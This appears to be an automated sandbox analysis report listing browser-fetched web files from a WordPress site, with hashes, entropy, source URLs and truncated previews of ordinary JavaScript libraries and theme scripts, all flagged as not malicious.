                                                                                                                                                                                                                                                                        Preview:/*!. * jQuery Upload File Plugin. * version: 3.1.2. * @requires jQuery v1.5 or later & form plugin. * Copyright (c) 2013 Ravishanker Kusuma. * http://hayageek.com/. */.(function(b){if(b.fn.ajaxForm==undefined){}var a={};a.fileapi=b("<input type='file'/>").get(0).files!==undefined;a.formdata=window.FormData!==undefined;b.fn.uploadFile=function(t){var r=b.extend({url:"",method:"POST",enctype:"multipart/form-data",formData:null,returnType:null,allowedTypes:"*",fileName:"file",formData:{},dynamicFormData:function(){return{}},maxFileSize:-1,maxFileCount:-1,multiple:!0,dragDrop:!0,autoSubmit:!0,showCancel:!0,showAbort:!0,showDone:!0,showDelete:!1,showError:!0,showStatusAfterSuccess:!0,showStatusAfterError:!0,showFileCounter:!0,fileCounterStyle:"). ",showProgress:!1,onSelect:function(s){return!0},onSubmit:function(s,u){},onSuccess:function(u,s,v){},onError:function(v,s,u){},deleteCallback:!1,afterUploadAll:!1,uploadButtonClass:"upload",dragDropStr:"",abortStr:"Abort",cancelStr:"Cancel",delete
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (740), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):740
                                                                                                                                                                                                                                                                        Entropy (8bit):4.721394575509887
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:XJUnH2UZXnmFXoIcs6eIkFuSqqUcx80e+XUr0GLLx807DvLs0G/eImtUon2Ilp2L:KHBZXsXKs6cFuSocl8oEHjG/rAPV+RLz
                                                                                                                                                                                                                                                                        MD5:8F1E1B49756247F4372CB94C852AF5E4
                                                                                                                                                                                                                                                                        SHA1:9F20CEAC4F154F6D74F3DE058AAFA34DBB65A3B4
                                                                                                                                                                                                                                                                        SHA-256:5C1E54BC74CA9478C700B98BD490D768C55D1FF6EF8DC8271C0CCA4F019CD3DC
                                                                                                                                                                                                                                                                        SHA-512:9A71FF1BFFC50BD7AD9D5FD09A0E617ED45DACFCAF71EB63AB8F6A7A156DC5D99C93705CBA00DDAC35EEED41800345A17DBB449F740BF861C57BB576932E3086
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(n){"use strict";n.fn.emulateTransitionEnd=function(t){var i=!1,r=this;n(this).one("bsTransitionEnd",function(){i=!0});return setTimeout(function(){i||n(r).trigger(n.support.transition.end)},t),this},n(function(){n.support.transition=function(){var n=document.createElement("bootstrap"),t={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var i in t)if(void 0!==n.style[i])return{end:t[i]};return!1}(),n.support.transition&&(n.event.special.bsTransitionEnd={bindType:n.support.transition.end,delegateType:n.support.transition.end,handle:function(t){if(n(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}})})}(jQuery)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (756)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):842
                                                                                                                                                                                                                                                                        Entropy (8bit):5.101801120347226
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:XanJO7hDI8uiiAh68KzRI6V5SLcIOJIdMILk:K0xuiiAM8KzRHecFIMWk
                                                                                                                                                                                                                                                                        MD5:D7853EC36D22154D63D4FD80BF963217
                                                                                                                                                                                                                                                                        SHA1:CC0C648ECAD4071221A2FA91D3D00C239ED29216
                                                                                                                                                                                                                                                                        SHA-256:513F83ADB54573C1BC60808E80BD3D9CD4B00141C0F904D2B2F16F8EA62EE260
                                                                                                                                                                                                                                                                        SHA-512:D29743DB9F438C7213B7B067D875BDD9102C312E16802E939C8B03F2D2E4A742E3C5E3CBC07DCA5C31BA848ABCE53A661E8CFCC1FE1D4F965E1E37A3DBDBABEB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/select2/i18n/en.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:/*! Select2 4.0.13 | https://github.com/select2/select2/blob/master/LICENSE.md */.!function(){if(jQuery&&jQuery.fn&&jQuery.fn.select2&&jQuery.fn.select2.amd)var e=jQuery.fn.select2.amd;e.define("select2/i18n/en",[],function(){return{errorLoading:function(){return"The results could not be loaded."},inputTooLong:function(e){var n=e.input.length-e.maximum,r="Please delete "+n+" character";return 1!=n&&(r+="s"),r},inputTooShort:function(e){return"Please enter "+(e.minimum-e.input.length)+" or more characters"},loadingMore:function(){return"Loading more results."},maximumSelected:function(e){var n="You can only select "+e.maximum+" item";return 1!=e.maximum&&(n+="s"),n},noResults:function(){return"No results found"},searching:function(){return"Searching."},removeAllItems:function(){return"Remove all items"}}}),e.define,e.require}()
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9141
                                                                                                                                                                                                                                                                        Entropy (8bit):5.2975271144294185
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:s6zoFrnW4iaX3LzDk1jpJLB2hlq717+3uClD2tFtJ7bykd+SHS+F:s6Udn3LzoJphH8uClD2tFtJ7byTwtF
                                                                                                                                                                                                                                                                        MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
                                                                                                                                                                                                                                                                        SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                                                                                                                                                                                                                                        SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                                                                                                                                                                                                                                        SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (18026), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):18031
                                                                                                                                                                                                                                                                        Entropy (8bit):5.3276032148469685
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:72VKrFEvwTVu6vo8M5AFZSOvRGt0X40GIV4wtoOS5WuKwLG5S7g6RT/2liJ:N2EVu6vo8M5AFfRG2nq5Wu0SBciJ
                                                                                                                                                                                                                                                                        MD5:1FFB73B14C96D3B4ADAA09E98D5BDF06
                                                                                                                                                                                                                                                                        SHA1:CB5364FC27BEC0951BAF69B8E2C38C11FEC74ECE
                                                                                                                                                                                                                                                                        SHA-256:230745EF2D704D2035A375273FAF058F0F64B1F4DAE17DD0D364782B92AD3FE5
                                                                                                                                                                                                                                                                        SHA-512:B24B0270CE8B96B98D153B07EFD330A3C2D11EF43EDA2A4BB300C356FF1F794DCF8A26C3DBB414C58F9BD45445054B5C16618B80A81FC5C425165E84D94BDC1B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/modernizr.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(e,t,n,o){var r=[],a={_version:"3.12.0",_config:{classPrefix:"",enableClasses:!0,enableJSClass:!0,usePrefixes:!0},_q:[],on:function(e,t){var n=this;setTimeout(function(){t(n[e])},0)},addTest:function(e,t,n){r.push({name:e,fn:t,options:n})},addAsyncTest:function(e){r.push({name:null,fn:e})}},i=function(){};i.prototype=a,i=new i;var s=[];function c(e,t){return typeof e===t}var l,d,u=n.documentElement,p="svg"===u.nodeName.toLowerCase();function f(e){var t=u.className,n=i._config.classPrefix||"";if(p&&(t=t.baseVal),i._config.enableJSClass){var o=new RegExp("(^|\\s)"+n+"no-js(\\s|$)");t=t.replace(o,"$1"+n+"js$2")}i._config.enableClasses&&(e.length>0&&(t+=" "+n+e.join(" "+n)),p?u.className.baseVal=t:u.className=t)}function m(e,t){if("object"==typeof e)for(var n in e)l(e,n)&&m(n,e[n]);else{var o=(e=e.toLowerCase()).split("."),r=i[o[0]];if(2===o.length&&(r=r[o[1]]),void 0!==r)return i;t="function"==typeof t?t():t,1===o.length?i[o[0]]=t:(!i[o[0]]||i[o[0]]instanceof Boolean||(i[o[0]]=ne
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (41625)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):150639
                                                                                                                                                                                                                                                                        Entropy (8bit):5.404735182175262
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:AwlL47MnAPaiA2UudRCe/fX2MkdF5kpjmgL1ZVplqpU:AwlgMgaiA2UuZ/P2MkdF5WL1/plqpU
                                                                                                                                                                                                                                                                        MD5:B20559412B1D0DC2412931B628AA8163
                                                                                                                                                                                                                                                                        SHA1:6EEE080D6EE3D588BC608CDA70D1B10CE75AA120
                                                                                                                                                                                                                                                                        SHA-256:35E9BDBAC24332F0DFEDB88D94AC1354C59B1B939A2FCA39991796517FCB74B1
                                                                                                                                                                                                                                                                        SHA-512:6BC184C8A14988D970A19994D4C1FCB83D191014DA2174E897CD85E27F53B9E513CF858D0B48264F6A7BA867D5112E240232CF14445CDB47CADE34B6DD7A3AD1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://js.hcaptcha.com/1/api.js?onload=hCaptchaOnLoad&render=explicit&recaptchacompat=off
                                                                                                                                                                                                                                                                        Preview:/* https://hcaptcha.com/license */.!function(){"use strict";function e(e){var t=this.constructor;return this.then((function(n){return t.resolve(e()).then((function(){return n}))}),(function(n){return t.resolve(e()).then((function(){return t.reject(n)}))}))}function t(e){return new this((function(t,n){if(!e||"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);var i=r.length;function o(e,n){if(n&&("object"==typeof n||"function"==typeof n)){var a=n.then;if("function"==typeof a)return void a.call(n,(function(t){o(e,t)}),(function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)}))}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}for(var a=0;a<r.length;a++)o(a,r[a])}))}var n=setTimeout,r="undefined"!=typeof setImmediate?setImmediate:null;function i(e){return Boolean(e&&"undefined"!=typeof e.length)}function o(){}function a(e){if(!(this instanceof
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):742
                                                                                                                                                                                                                                                                        Entropy (8bit):5.0542422744801865
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2Nss5N8a/pCAYONJ1FRwDpituWYEu3ChWKA2scMjxIS4RWUkE+32FeWRWm7Ps7eQ:2Nf5N8+9YCJ1FRwMtDYjSIK2cMjxIS4g
                                                                                                                                                                                                                                                                        MD5:B67241C4E15000A87197690020450B0E
                                                                                                                                                                                                                                                                        SHA1:99451BB82B263DD069176F8B5B168EDB3BD7B6E5
                                                                                                                                                                                                                                                                        SHA-256:B5334533B620FBAD01C58B7A4374839BF85832A1433077DD103BC6CE4D31FF8F
                                                                                                                                                                                                                                                                        SHA-512:DDCC2DF9C9964896AEDB04E905AF2F9CE6DD957751073B87AD80743D44AA2B107E94FBA4BE1198D6FF75CC213F75D96DDB883DB5F3E37D09D88FFF9D70ED6B5B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://a.remarketstats.com/px/smart/?c=2645100a8c95db0
                                                                                                                                                                                                                                                                        Preview:(function (w, d) {. var dynamicPixel = function() {. var pixelURL = "https://a.remarketstats.com/px/smart/?c=2645100a8c95db0&seg=";. var urlPath = w.location.pathname.substr(1).replace(/\/+$/, '');. if (urlPath === "") { urlPath = "home"; }. console.log(urlPath);. var segmentValue = urlPath;. var script = d.createElement('script');. if (pixelURL.indexOf("seg=") === -1) {. pixelURL = pixelURL + "seg=";. }. script.src = pixelURL + escape(segmentValue);. d.getElementsByTagName('script')[0].parentNode.appendChild(script);. };.. var body = d.getElementsByTagName('body')[0];. if (body) {. dynamicPixel();. } else {. w.onload = function () {. dynamicPixel();. }. }.})(window, document);.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3565), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3565
                                                                                                                                                                                                                                                                        Entropy (8bit):4.980465550334997
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:JMMQtnl7fDPcROyrQLfDJ6b5tol7fDPcROyrQLfDJ6b/jc+xjqwC3m4Ni3lNMM3t:JMMoV78JKie78JKQ1qwYQKbY
                                                                                                                                                                                                                                                                        MD5:D2EE3E17A1B873450D5279C349C0E690
                                                                                                                                                                                                                                                                        SHA1:5C4A3B1D3D0DADBE74E02523209AD5D4C98B941D
                                                                                                                                                                                                                                                                        SHA-256:D73BD8496F33CEDE958D878D2B14FA2368C8939275DA7C3F5AEA3BE6D7BC857A
                                                                                                                                                                                                                                                                        SHA-512:CA41BA42FBAA1B9ABCD86EF91952C162BACAE75A91F1B6B8E52F80F506EAC1E3A213DDAAECD32C4A9634A72610F48B408E80FC83794129377A908819F48B6C6B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-widget-areas.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function fusionReSettStickySidebarStatus(){setStickySidebarStatus(calcStickySidebarOffset())}function setStickySidebarStatus(e){!Modernizr.mq("only screen and (max-width:"+avadaSidebarsVars.sidebar_break_point+"px)")&&Math.floor(jQuery("#content").height())>=Math.floor(jQuery("#main").height())?(jQuery(".fusion-sidebar-left.fusion-sticky-sidebar .fusion-sidebar-inner-content").hasClass("fusion-sidebar-stuck")||jQuery(".fusion-sidebar-left.fusion-sticky-sidebar .fusion-sidebar-inner-content").stick_in_parent({parent:"#main > .fusion-row",sticky_class:"fusion-sidebar-stuck",bottoming:!0,spacer:!1,offset_top:e}).on("sticky_kit:stick",function(e){var s=jQuery(e.target);jQuery("body").hasClass("double-sidebars")&&(s.css("margin-left","0"),s.parent().css({"margin-left":s.data("margin"),width:s.data("width")})),s.parent().children(".fusion-panel-shortcuts-wrapper").length&&(s.parent().removeClass("fusion-panel-customizable-needs-positioned"),s.prepend(s.parent().children(".fusion-panel-shortc
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3716), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3716
                                                                                                                                                                                                                                                                        Entropy (8bit):5.308935060642068
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:XveMh9/3I8z2iIHugsYfCpstBR3iuRVxNP://n20Y6ytBR3iuR
                                                                                                                                                                                                                                                                        MD5:D8AC279425BBE852C2CAEDEFF76BB19F
                                                                                                                                                                                                                                                                        SHA1:B00E06765B008E87389E9B692FE0DD09949A05E9
                                                                                                                                                                                                                                                                        SHA-256:2366B982A14BF1A6175490D4C10CB24E200F6838E4AD5DC233D7AE5C12913365
                                                                                                                                                                                                                                                                        SHA-512:7FCE1D93B4CAB176BF0AFD59D1DA980D53F1629BAA748686AA3DEE63C22C88031E134B7D64B929696813ABA14D4BFB65D92912A8DDD8B226C17C240CA516F1DB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-title.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(t){"use strict";t.fn.awbAnimateTitleHighlightsAndRotations=function(){"IntersectionObserver"in window?t.each(fusion.getObserverSegmentation(t(this)),function(i){var n=fusion.getAnimationIntersectionData(i),e=new IntersectionObserver(function(i,n){t.each(i,function(i,a){var o=t(a.target);fusion.shouldObserverEntryAnimate(a,n)&&(t(o).hasClass("fusion-title-rotating")&&t(o).animateTitleRotations(),t(o).hasClass("fusion-title-highlight")&&t(o).animateTitleHighlights(),e.unobserve(a.target))})},n);t(this).each(function(){e.observe(this)})}):t(this).each(function(){var i=t(this);t(i).hasClass("fusion-title-rotating")&&t(i).animateTitleRotations(),t(i).hasClass("fusion-title-highlight")&&t(i).animateTitleHighlights()})},t.fn.animateTitleRotations=function(){var i=t(this),n=i.find(".fusion-animated-texts-wrapper"),e=i.hasClass("fusion-loop-on"),a=t(i).closest("[data-animationduration]").data("animationduration"),o=void 0!==a?200*parseFloat(a):0;n.removeData("textillate"),t(i).find(".
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4290), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4290
                                                                                                                                                                                                                                                                        Entropy (8bit):5.3605300729646626
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:Dhexw5Bo+BJY461u10T+eC2BrU40VnR8e0xy4riau28a0Vcy:DhedUG4gjCSUae0w4rijKy
                                                                                                                                                                                                                                                                        MD5:63AD7E16EB210D0797C5F88BB2870471
                                                                                                                                                                                                                                                                        SHA1:57354D3753EDAAA63C69F258263879947E38E904
                                                                                                                                                                                                                                                                        SHA-256:7B39CC6490B20A7AD8B433992F1132F2C9F2CB112DEAD8E097CB91F6387C3FAB
                                                                                                                                                                                                                                                                        SHA-512:B1A51A27D2623EF0772A4012BADFDBD24AE0884367ADBC0986881B1CB3ABEC8F043BF85E659E7D6E33A0C92B47C591670D3A6958776ACBA8CC074EE93FF56365
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:var prevCallback=window.onYouTubePlayerAPIReady,fusionTimeout=[];function registerYoutubePlayers(e){!0===window.yt_vid_exists&&(window.$youtube_players=[],jQuery(".tfs-slider").each(function(){var t=jQuery(this),a=t.find("[data-youtube-video-id]").find("iframe").length,i=!1;t.find("[data-youtube-video-id]").find("iframe").each(function(o){var u=jQuery(this);a===o+1&&void 0!==e&&(i=t.data("flexslider")),window.YTReady(function(){window.$youtube_players[u.attr("id")]=new YT.Player(u.attr("id"),{events:{onReady:onPlayerReady(u.parents("li"),i),onStateChange:onPlayerStateChange(u.attr("id"),t)}})})})}))}function onPlayerReady(e,t){return function(a){"yes"===jQuery(e).data("mute")&&a.target.mute(),t&&setTimeout(function(){playVideoAndPauseOthers(t)},300)}}function loadYoutubeIframeAPI(){var e,t;(!0===window.yt_vid_exists||jQuery("body").hasClass("fusion-builder-live"))&&((e=document.createElement("script")).src="https://www.youtube.com/iframe_api",(t=document.getElementsByTagName("script")[
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4124), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4124
                                                                                                                                                                                                                                                                        Entropy (8bit):5.009836527230761
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:pKcQfyJBsb9SU7eNizYzVPaPAyy5fDjyBdjysQfYvUMmhemvmYD0ed7mhem2mv8R:AcZfk99zYz5gbylWbQfSBiprd7BLuf2
                                                                                                                                                                                                                                                                        MD5:6FFA961730A23022669E269D351AB473
                                                                                                                                                                                                                                                                        SHA1:BD7A99F25EA14D59115A4EE29619B11379EF8366
                                                                                                                                                                                                                                                                        SHA-256:717ADCF5D4112F3E61DB220F88AA9355FF9B772D5EC33B0ED47DE499C0946421
                                                                                                                                                                                                                                                                        SHA-512:C57F2EE5AB13E0942F7DC59EC0CA40E8E149E49AF8788E448A96D6A2FC8815D1F32360EB5B5DD7DA21862FC4646B035A59FCF8CDD6A0DACD84C4BDE3EB933F7D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(document).on("click",".um-popup-overlay",function(){remove_Modal()}),jQuery(document).on("click",'.um-modal-overlay, a[data-action="um_remove_modal"]',function(){um_remove_modal()}),jQuery(document).on("click",'a[data-modal^="um_"], span[data-modal^="um_"], .um-modal:not(:has(.um-form)) a',function(e){return e.preventDefault(),!1}),jQuery(document).on("click",".um-finish-upload.file:not(.disabled)",function(){var e=jQuery(this).attr("data-key"),a=jQuery(this).parents(".um-modal-body").find(".um-single-file-preview").html(),a=(um_remove_modal(),jQuery(".um-single-file-preview[data-key="+e+"]").fadeIn().html(a),jQuery(".um-field[data-key="+e+"]").find(".um-single-fileinfo a").data("file"));jQuery(".um-single-file-preview[data-key="+e+"]").parents(".um-field").find(".um-btn-auto-width").html(jQuery(this).attr("data-change")),jQuery(".um-single-file-preview[data-key="+e+"]").parents(".um-field").find('input[type="hidden"]').val(a)}),jQuery(document)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2054), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2054
                                                                                                                                                                                                                                                                        Entropy (8bit):5.081825983936001
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:w1c+SuM3hvHWzzaWFovF+ALdOW4ZQ5g1XkfEyoJATuFmNeYkyZ0+j9O7E/HNyTcR:we3u41pf6iNeYkyZ0P7bcFR6HMyp/w
                                                                                                                                                                                                                                                                        MD5:73361FE6ACC0D64E9CDE6C2C73CF5E40
                                                                                                                                                                                                                                                                        SHA1:7BA7EF55479B5172DC52D6DEADA7AB48200FE0B3
                                                                                                                                                                                                                                                                        SHA-256:F529A41B5C9C8B32D4615329BE6539463CF422B5932F07C68A403290CFDF4B5D
                                                                                                                                                                                                                                                                        SHA-512:3BE486BE085BF0B92B589499E8A0C9B7C3BD6A57A44570887472FFB452191A51A2554C3F63A9AE524A5632E4AFC10396D9297187FBFDDB3FC8F8EE4D84E44721
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-quantity.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function avadaAddQuantityBoxes(t,a){var e=!1,n=jQuery("body").hasClass("wcopc-product-single");t||(t=".qty"),a||(a=jQuery("div.quantity:not(.buttons_added), td.quantity:not(.buttons_added)").find(t)),a.length&&(jQuery.each(a,function(t,a){"date"===jQuery(a).prop("type")||"hidden"===jQuery(a).prop("type")||jQuery(a).parent().parent().hasClass("tribe-block__tickets__item__quantity__number")||jQuery(a).parent().hasClass("buttons_added")||(jQuery(a).parent().addClass("buttons_added").prepend('<input type="button" value="-" class="minus" />'),jQuery(a).addClass("input-text").after('<input type="button" value="+" class="plus" />'),e=!0)}),e&&(jQuery("input"+t+":not(.product-quantity input"+t+")").each(function(){var t=parseFloat(jQuery(this).attr("min"));t&&0<t&&parseFloat(jQuery(this).val())<t&&jQuery(this).val(t)}),jQuery(".plus, .minus").off("click"),jQuery(".plus, .minus").on("click",function(){var a=jQuery(this).parent().find(t),e=parseFloat(a.val()),i=parseFloat(a.attr("max")),o=parseF
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (844), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):844
                                                                                                                                                                                                                                                                        Entropy (8bit):5.024576975534547
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:M6r0W7PZjqwrKAMkzcXaWfWjvP3SKLcAc54vPK8XSKLcAc5e4n:Mi/9jqwrlMjXvWzPCKoh5cTiKoh5e4
                                                                                                                                                                                                                                                                        MD5:4A40675F5B541916EF99659BD7013AEB
                                                                                                                                                                                                                                                                        SHA1:467FCA6127C9976D51BBC1E78CB771BE1BC1CD92
                                                                                                                                                                                                                                                                        SHA-256:CA5DCDFA1827FCA8AABBF974CFA7515D1C733F9BDEFEE8016DF80F2E0BBD43F7
                                                                                                                                                                                                                                                                        SHA-512:8E9321A12D509D9B951B739A5718C128F1AEF60DD0E84382131C77C295F7CABEA48C2FF1DC7220D06891E416E024F310D17592C7C8EA4A5702BBDA6158F23709
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function fusionGetScrollOffset(){var t,o=fusion.getAdminbarHeight(),e="function"==typeof getStickyHeaderHeight?getStickyHeaderHeight():0,s=parseInt(o+e+1,10);return jQuery(".fusion-tb-header").length&&"function"==typeof fusionGetStickyOffset?(t=fusionGetStickyOffset())?t+1:o:s}jQuery(document).ready(function(){jQuery("body").scrollspy({target:".fusion-menu",offset:fusionGetScrollOffset()}),jQuery(window).on("load fusion-sticky-change fusion-sticky-scroll-change",function(){"object"==typeof jQuery("body").data()["bs.scrollspy"]&&(jQuery("body").data()["bs.scrollspy"].options.offset=fusionGetScrollOffset())}),jQuery(window).on("fusion-sticky-transition-change",function(){setTimeout(function(){"object"==typeof jQuery("body").data()["bs.scrollspy"]&&(jQuery("body").data()["bs.scrollspy"].options.offset=fusionGetScrollOffset())},300)})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (18843)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):18878
                                                                                                                                                                                                                                                                        Entropy (8bit):5.200208004249851
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:u2Rq5yjN1V02mEHrJDzWp3D0bMpOt3PPD71ijeE9OWj:LqIbV0sHG3D0dD71Uj
                                                                                                                                                                                                                                                                        MD5:16699A7F2AEBE8D676042962C3BB5537
                                                                                                                                                                                                                                                                        SHA1:9697E3FE2D92C79DEBD82478603D4B59FC249714
                                                                                                                                                                                                                                                                        SHA-256:5152316FADE8C592FBFD38BC491E059464D967D3D31A582B0C885C0961DEED30
                                                                                                                                                                                                                                                                        SHA-512:49AE27B783F99B50A7FE43F084554EDBC87E430982C736C425FDFC26D1550C19B28C6127D3C8A730A31317ADF90008CFE5DBDDD27ECC6E1096D5520704ED8621
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
